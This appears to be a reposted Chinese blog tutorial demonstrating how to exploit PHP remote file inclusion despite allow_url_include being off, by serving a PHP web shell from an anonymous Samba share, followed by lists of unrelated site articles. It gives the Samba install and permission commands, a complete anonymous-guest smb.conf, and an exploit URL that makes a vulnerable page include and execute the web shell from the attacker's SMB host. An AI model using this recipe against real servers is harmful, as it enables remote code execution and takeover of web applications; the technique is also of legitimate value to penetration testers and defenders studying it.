使用SMB共享来绕过php远程文件包含的限制执行RFI的利用


Posted in PHP onMay 31, 2019

在这篇博文中,我将为大家演示如何利用PHP应用中的远程文件包含漏洞的技术。我们将绕过php远程文件包含的限制,并执行RFI的利用,即使PHP环境被配置为不包含来自远程HTTP/FTP URL的文件。

PHP 和 SMB 共享文件访问

在PHP配置文件中,“allow_url_include”wrapper默认设置为“Off”,指示PHP不加载远程HTTP或FTP URL,从而防止远程文件包含攻击。但是,即使“allow_url_include”和“allow_url_fopen”都设置为“Off”,PHP也不会阻止加载SMB URL。而这就极有可能被滥用来从SMB共享加载远程托管的PHP Web shell。

攻击场景概述

当易受攻击的PHP应用程序代码尝试从受攻击者控制的SMB共享加载PHP Web shell时,SMB共享应允许访问该文件。攻击者需要在其上配置具有匿名浏览访问权限的SMB服务器。因此,一旦易受攻击的应用程序尝试从SMB共享访问PHP Web shell,SMB服务器将不会要求任何的凭据,易受攻击的应用程序将包含Web shell的PHP代码。

首先,我重新配置了PHP环境,并在php.in i文件中禁用了“allow-url-fopen”和“allow-url-include”。之后,配置了具有匿名浏览访问的SMB服务器。一旦SMB共享准备就绪,我们就可以利用易受攻击的应用程序了。

PHP 环境设置

将托管易受攻击代码的机器上的“allow_url_fopen”和“allow_url_include”设置为“Off”

以下是版本为“5.5.11”的PHP当前配置截图:

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

在继续下一步之前,让我们确保当我们尝试访问HTTP上托管的Web shell时,PHP代码不允许远程文件包含。

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

可以看到,当我试图从远程主机包含PHP Web shell时,应用程序抛出错误并且没有包含远程文件。

使用匿名浏览访问配置 Samba 服务器(Linux 机器)
使用以下命令安装Samba服务器:

apt-get install samba创建SMB共享目录:

mkdir /var/www/html/pub/

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

配置新创建的SMB共享目录的权限:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

运行以下命令,删除SAMBA服务器配置文件的默认内容。

echo > /etc/samba/smb.conf将以下内容添加到/etc/samba/smb.conf文件。

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555

force user = nobody现在,重启SAMBA服务器以使配置文件/etc/samba/smb.conf中的新配置生效。

service smbd restart成功重启SAMBA服务器后,尝试访问SMB共享并确保SAMBA服务器不要求提供凭据。

在本例中,SAMBA服务器IP为192.168.0.3,我需要访问Windows文件浏览器中的SMB共享,如下:

\\192.168.0.3\ 

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

在 SMB 共享中托管 PHP Web shell

太棒了!可以访问smb共享,并显示目录“ica”存在。

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

现在,将PHP shell托管在目录“/var/www/html/pub”中,该目录为smb共享目录“ica”。

成功托管PHP shell后,我们使用Windows文件浏览器访问SMB共享目录“ica”。

\\192.168.0.3\ica\可以看到php shell存在于smb共享目录中,在本例中为box.php文件。

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

利用文件包含易受攻击的参数
让我们使用这个PHP shell SMB链接,以及易受攻击的php代码浏览它。

http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.phpPHP易受攻击的代码从SMB共享中获取了web shell,并在应用程序服务器上执行了代码\m/。我们已经绕过了php远程文件包含的限制,并包含了托管在远程主机上的Web shell。

使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 

总结

以上所述是小编给大家介绍的使用SMB共享来绕过php远程文件包含的限制执行RFI的利用,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持!

PHP 相关文章推荐
PHP中的超全局变量
Oct 09 PHP
DedeCMS dede_channeltype表字段注释
Apr 07 PHP
Yii PHP Framework实用入门教程(详细介绍)
Jun 18 PHP
php汉字转拼音的示例
Feb 27 PHP
简单谈谈PHP vs Node.js
Jul 17 PHP
php生成Android客户端扫描可登录的二维码
May 13 PHP
PHP调试及性能分析工具Xdebug详解
Feb 09 PHP
在Yii2特定页面如何禁用调试工具栏Debug Toolbar详解
Aug 07 PHP
PHP实现UTF8二进制及明文字符串的转化功能示例
Nov 20 PHP
PHP7新功能总结
Apr 14 PHP
PHP针对redis常用操作实例详解
Aug 17 PHP
利用PHP计算有多少小于当前数字的数字方法示例
Aug 26 PHP
PHP使用ActiveMQ实现消息队列的方法详解
May 31 #PHP
php中的buffer缓冲区用法分析
May 31 #PHP
PHP实现基于状态的责任链审批模式详解
May 31 #PHP
Laravel框架实现调用百度翻译API功能示例
May 30 #PHP
Laravel框架学习笔记之批量更新数据功能
May 30 #PHP
PHP实现的微信公众号扫码模拟登录功能示例
May 30 #PHP
PHP使用PDO创建MySQL数据库、表及插入多条数据操作示例
May 30 #PHP
You might like
php返回当前日期或者指定日期是周几
2015/05/21 PHP
PHP中substr_count()函数获取子字符串出现次数的方法
2016/01/07 PHP
LaravelS通过Swoole加速Laravel/Lumen详解
2018/03/02 PHP
一个封装js代码-----展开收起效果示例
2013/07/03 Javascript
JQuery each打印JS对象的方法
2013/11/13 Javascript
node.js中的fs.lstatSync方法使用说明
2014/12/16 Javascript
3kb jQuery代码搞定各种树形选择的实现方法
2016/06/10 Javascript
Bootstrap基本插件学习笔记之标签切换(17)
2016/12/08 Javascript
node使用UEditor富文本编辑器的方法实例
2017/07/11 Javascript
详解使用vue-admin-template的优化历程
2018/05/20 Javascript
详解Vue Elementui中的Tag与页面其它元素相互交互的两三事
2018/09/25 Javascript
微信小程序日历效果
2018/12/29 Javascript
微信小程序使用map组件实现路线规划功能示例
2019/01/22 Javascript
package.json配置文件构成详解
2019/08/27 Javascript
vue3修改link标签默认icon无效问题详解
2019/10/09 Javascript
vue.js 子组件无法获取父组件store值的解决方式
2019/11/08 Javascript
一行JavaScript代码如何实现瀑布流布局
2020/12/11 Javascript
vue实现两个区域滚动条同步滚动
2020/12/13 Vue.js
Python内置的HTTP协议服务器SimpleHTTPServer使用指南
2016/03/30 Python
Python中文分词实现方法(安装pymmseg)
2016/06/14 Python
python 获取文件下所有文件或目录os.walk()的实例
2018/04/23 Python
windows10下安装TensorFlow Object Detection API的步骤
2019/06/13 Python
python实现超市商品销售管理系统
2019/11/22 Python
python生成特定分布数的实例
2019/12/05 Python
python global和nonlocal用法解析
2020/02/03 Python
opencv python Canny边缘提取实现过程解析
2020/02/03 Python
Python虚拟环境的创建和包下载过程分析
2020/06/19 Python
python使用多线程查询数据库的实现示例
2020/08/17 Python
Bluebella德国官网:英国性感内衣和睡衣品牌
2019/11/08 全球购物
Linux面试题LINUX系统类
2015/11/25 面试题
应聘教师自荐信
2013/10/12 职场文书
英文版销售经理个人求职信
2013/11/20 职场文书
2015年质量月活动总结报告
2015/03/27 职场文书
放牛班的春天观后感
2015/06/01 职场文书
欢送领导祝酒词
2015/08/12 职场文书
2016十一国庆节感言
2015/12/09 职场文书